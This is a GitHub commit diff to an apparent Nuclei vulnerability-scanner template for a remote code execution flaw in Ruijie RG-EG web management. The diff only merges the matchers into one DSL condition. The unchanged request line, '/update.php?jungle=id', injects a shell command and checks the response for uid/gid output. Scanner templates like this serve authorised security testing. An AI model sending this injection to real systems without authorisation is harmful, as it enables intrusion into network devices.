Update ruijie-rg-eg-web-mis-rce.yaml

patch-1
pussycat0x 2023-12-25 23:17:23 +05:30 committed by GitHub
parent f5507a81b9
commit dc0ad486a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 9 deletions

View File

@ -31,13 +31,10 @@ http:
- method: GET
path:
- "{{BaseURL}}/update.php?jungle=id"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
condition: and